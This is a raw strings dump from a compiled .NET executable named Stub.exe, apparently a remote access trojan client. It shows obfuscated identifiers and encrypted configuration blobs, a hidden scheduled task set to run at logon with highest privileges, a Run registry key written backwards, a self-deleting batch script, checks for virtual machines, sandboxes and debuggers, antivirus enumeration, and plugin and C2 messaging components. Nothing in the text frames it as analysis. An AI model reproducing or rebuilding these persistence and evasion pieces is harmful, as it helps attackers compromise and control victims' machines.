!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
cGeUlkGdDGA
gYaHZZqeqLA
RpyLSZqGbBIuPA
IHblLICOcA
RXpgkwnbdKfcuoA
sCgpTLwoSAB
IDfKoAgRWBB
lXlAqdJMHYWCB
xbXlcTtunJmCLWB
AmntZvuRCOaB
sRAWzSEBjeeVeB
XuMkWftlhB
vmQKOZSLJpB
qtcNeZbSQNtXVkrKuB
LcYUgvYwtLIQxB
OWKjbSvtUJC
mBUMczgOKC
SdvApZCdlXKC
gJpqiuWfNC
BUvTsVEnTOC
vKMblAOradvCQC
ZOQUuZlYFQC
xCKoFATbJQexFSC
pVRkXrhDKTC
sTipBsSbqebQiaC
xfJgsLaXMKzonuoC
ZqULyCkWLpC
iJyoVkuZTmED
BSNaRcAzHUtGD
MapNameToOID
get_FormatID
cDDOGUMqHKD
tcsUsNchlLZD
QQWpUlflxXjD
ASopEvhkhqD
ZHvoDFFWJdwlmnOVUE
VnQAaFeNhHDjhE
NRzMDRDqFmrTqE
erEkyQDparE
PBWHeaPiduE
ZzucgYBlqguxE
htvDzKWqKrIDF
wHjfibVtJF
tJXKFexjLqdaF
LHZdendbBpF
LSKxkLySdEWgXGriqF
DZShkTKnzaitF
kxHuhqZujhwF
gIskyEvjLlfixF
okpRQKsttKBG
amOSHRaNOG
vCSifQGaZAmIfG
ePLGpYwELKAH
lRIGpHwkZCBH
kjFpbDTEDYmCH
SLZSAIVOBvEH
SCvEHJXDJeKH
bcnNxvjuaTrsH
oRjiIkmUARePEI
get_ASCII
PNyIwhtRJyEbI
eORYNvbnbdI
hyPAoxpDYlDeI
ackJsKTPxZVKhI
GNLKVlICHuI
rVKZDyzgqDJ
vfxeMjrbHJ
zSLZiNXfwOdYYJ
opDqeabJoZeJ
reOZNkzYTnJ
HSdAADYmuwhQtJ
hGipvoCnNaPK
dDOXybYtlmPVJVQK
hiBrsWYVdlqjfUK
vmMABoRCPpoWK
vRbjwFzsRBXK
OmOWQBxChepgbZK
CInUWPSZzZKdK
VacphNJlrskK
NUJqWoYMPbehAL
RGgfJHfhAfBKL
YhUcarWRIEML
udeFYWIqLeWL
wrDugFfhEFYL
TaDvDGMNMSQBGbL
DYGsmFvLcL
MjSqNqQwbiCeL
VKSWqqRMhL
uZsVAhNIGjiL
cDCjSoALqmfFcCM
cLxdYvodLM
ROxQNcQPJvdRM
YBuJtqWpNDjXM
hUdaIulMPfM
YIgZwBTkPEVgfM
PHpGBMivbhM
WDiVXhYNOQjM
IlBqViuxSjM
vEKZaqUpYwkM
bcfxDBCVakoM
OnsKPNHPYZtzM
pNKnsHgvNXAN
UQkkHODvCaKEN
igfqSddJczySPAFN
ichSXtDpUcUCwVGN
tLHzynHmQQN
wyJeHKNHErsjdN
vkGSmlmoQDkN
bFyNynseiqLmpJdkN
RwWIUUjdErN
GOKuAFbouN
tlydNorTfzN
FSpyVrOHLpNyzN
SanWhXgIAwRKBO
wgCndxrUXuCO
BswjoMEHXyHO
System.IO
jPfTdcMgiEPtKO
CJBqtbgRqmTNO
OkYGzqLqkhLoO
UVIDtPUJUXxJwvO
sVwVUXxhDP
GuVvBGDarTsIP
HNwxIJbfbMP
KQCaSZcKBrYSP
sYfcQBaItZP
yYTdmPYuZP
xqBYlBPinDaP
EbrixVOhkuriYdP
vzCXpzBTDfP
urPDPCoNEWBlP
bfBGXGaxWOzP
tdlqjmtAuCCDQ
NSISqzumddlQQ
JGkcpCWFCTQ
MQfKXLYIpIqGTQ
EDfQTaJcTQ
CokJeppjIxTQ
tXAFbEDPKwQ
lgjLHRUEYwMHR
AHIfOxTefwHQR
knZHmBKrvTR
xnMIUBYjaWR
mgNtEOhfaKLYR
MsrJBKgOYhJebR
QdlEsGjDbdJIibR
cigAFaOfKGUgR
OrfVhTBzregR
equchxHUPZURhkR
mOQBRqbrwuOlR
yCccFnLwEupwnR
dLXWkmiRIS
wMlaYIaSkpgJSS
ETEPqPpanGbS
LAyDRqqSbS
FWDnSgVJLnCzfS
UaybYGAPdvPT
HRmcqDxfysMrWgT
OxujGoYWjCDU
smeTeIjUnMU
zIFPokDxTeIbU
QOmYhTpnlgU
wqXHxXfjuAPjU
zelqyCKugJZpU
RVxXxndRsU
udzxajLujGfuU
SYmOZIUCBFV
get_IV
set_IV
GenerateIV
EJSdzNlNKYoygkV
LjEvHIxvyAAfYorV
iJHSIDoiVDtV
LqWARXJKiFwFW
yeUuqwGpqEHW
ojCxkraThqYNHW
CfkZtvzlCocXW
egswdIjGdW
dryMZHRsEIqtlW
PKMPqkPzvQqW
JXwSZzLtIfCAvW
unWLJwEZKwW
poVOizFmsFyCX
dDYzpCgoQSOX
nEeRqajojeXX
AOMKxMaQSYkyYX
ZRQLJxUGRdbfX
atPjtibpEDTIZgX
cxFDNGTnqmMDY
kMSrfxIHXnMzIIVsSY
YooygGNKjVlxaY
QdEOauvXrY
FcQYBrqMNSsY
rytihQOKZdSTMZ
JDHPrmRvjSZ
MoknRZozpECUPTZ
qppghDDEiZ
VoaNHBaWPhdKRjZ
xJsPnoMvWVnZ
vVGoxAPWaQlnZ
vLGcCVEhePuoZ
llJGDlxudXgrZ
value__
wwwHvphZJOa
JzZstRwPdXogYa
gCmrlhCZqa
DdeHUCSiSwa
koZdLuVZJRb
mscorlib
slzvENoUjb
iIWwJyeUdBjosAkb
fLAUDMXidUYCltb
icJMxUkbwmkdObEc
qvAItVyfIgqnJc
RcsyDchRPDFRc
YmZvEEjhiSc
SpVuBloWVtvkOWc
xLsuZDEXRWcc
System.Collections.Generic
Microsoft.VisualBasic
oYXFeUntwnc
get_SendSync
vpaGiaDFtrc
iwHCUJPABxRuJd
FnVpOKfCHOd
WEfDWANOLMFbPd
EndRead
BeginRead
Thread
CamntZeAHLubd
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
get_Guid
HsbjwFurjd
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
discord
zwljLqeBJGe
wrNKHsnySfbTqOe
bfxaKFMJWyRe
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
WPXnyKQlaeyhe
BwMQiHJhQuCje
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WvkomlGhvACne
WriteLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
ZviKmqDVhckre
System.Core
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
JXmMNsehxTBCf
JValFUQpKNf
DowrbLHySkYf
walcwukEeVcgf
jkQyHMjHRNRUkf
GcbGELatgWtf
DNJqLOPDyGpoPBAg
CRNGyUelJg
JdSZKyqSHDRg
tcODUXLkNadRWg
nrOBFPIQTCshg
CryptoConfig
yxChFMNQkg
YComrznxkg
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
sVKlQfDFMqQCh
nnRYELwHULoCKh
hEatzjLoIeOh
TAJrlrAyFNiAhWTh
mAGnwctZnh
ayrVQuWvNSeKynh
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
get_Length
kcEKiitkIYvh
PdUyJGkKrpLxh
kafxHjkcHUxFi
jOYaKZOndXLyLi
uxBAGMXWrfcpUi
pFvpvPvUfi
hbIhWbnsCozii
renFYnRcWDji
UaJlTnRaBHki
NYdHkflGmi
bMhfiFQHQHPTDj
FyLNnUYWSZFj
uKAjiWsTuFuQj
QHqiemhtPmCmj
OuetKlHGsGuj
pNHQZZaWJwCk
GTMxsNwCqnwdFFk
tICBSEPBHliXMILk
BjHARIVEJImQrOk
pQQBZXwgCUPk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
NVsBpDgqdinQl
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
kernel32.dll
user32.dll
ntdll.dll
SYlYPydETBzrl
KardvbGGcgaFm
SuNvpaBLyDuahNm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
AqETVvBBdJcm
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
AYngAoTRpTnkm
uMNcjVTdfnm
Random
ICryptoTransform
pifiCchsYbZXKtm
qymlrnXuutXn
ToBoolean
X509Chain
AppDomain
get_CurrentDomain
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
UTsfmFEGQINpn
jGQNjYUQdJawn
AokDQQqwjTDCo
wtLRzmjPiAKlGo
OpYkzVWbzxbgTPo
nmoMygnyLFdo
MPWExSlvRcdo
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
PNVmEgQpTno
yBXrNlynno
PjufVOLtTFSGp
gAcOYNuAxvHp
EohtQMIpIhLWp
jcePZMxTahp
Microsoft.CSharp
CYXlVObyOzHq
VKebpZffRZhMq
iQswzDzEKVbeq
vRkUooHEZBEhvRmq
System.Linq
dNYpiJkZfuAyq
osqaTLzpCpeHr
WLbgNyugHrXKr
AdPEzlBNfLwUr
bzYZTppxbhzdhdcr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
HPexWGFGVfr
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
ROHIiVXqyjIs
AFXgnvXmDKKZWs
DpnxztYRvHYs
SZuiMCAYeghas
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
cbJSxZXxos
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
WHYofgfLoPmSt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
CFsqrTXOWvsNft
IAsyncResult
ToUpperInvariant
WebClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
qVSqDBMfZLrt
ParameterizedThreadStart
Convert
PbFIefRVwrt
FailFast
ToList
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
TSxETdpKAu
LHSvYrSRNfGvNHu
mzRQgyiuSzbu
uGpBBtWPWiu
xGyjWOeHlu
Nolijmeoelu
JWCysoCiYpu
OCoGQzZDaIqu
UiIkcpGvFTECLggv
YvqlAfhYKZjv
uGSpjSwzFZOsv
SACntYslClSYxv
riZueYWRGCyv
CXzeowIyzv
fmhFlUNcRZKpITFEOw
eHarwtctSw
bGMFCdUzhVeew
XzwTflMhVlw
GetForegroundWindow
set_CreateNoWindow
JUeSfBOxLx
QDolhSXxoSx
pdMVFYPFHMqSx
euXrkzVjMUkx
zaWxmfQxCy
HanYZUymAikLy
dccoLmXQtbMy
JZpbyglRaAdWy
JgreWTQjtkDQSXy
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
fLJCxDffIhDly
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
zoLqxtdNfDNYsy
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
DFkJfQhOPkIwy
DdTCOQJYojwFAz
nNQsciZFNODAGz
BEIZyggWhaz
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName.NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
uTrndFkVNf41LNFPMMe/yDZ74kCgb7HYm+JXK90gSvEPVyFhUfCM2Z+bv2oEg/LJ4NUWqHKq43IrtkBhrah9Jg==
bpFitB1GUVRBF1o7KSFTQXst8D7AsdF2T1pPCNB10TZYiRqqFYLTVI4irTd6UWMngdrGPohzHTsoLWLbDNYjvxDIsrRR8HJUyaoC5d4LPfs=
qzjgrw5W4juEVaTopK5A7ONkqotjZL+REPCmsvyRTjNgwYlUD26LK66DBUJUQmP3O7NVUAbVLTW5hq5/2KbGTg==
y2MYhbefsH+sK2N2hqt/t9m+82MATzGeA9a9xb5VC+qmAM5sUJkDmqvXTQn0414HGTTglc56n1NciIMP7ooq7A==
%AppData%
epic.exe
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
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0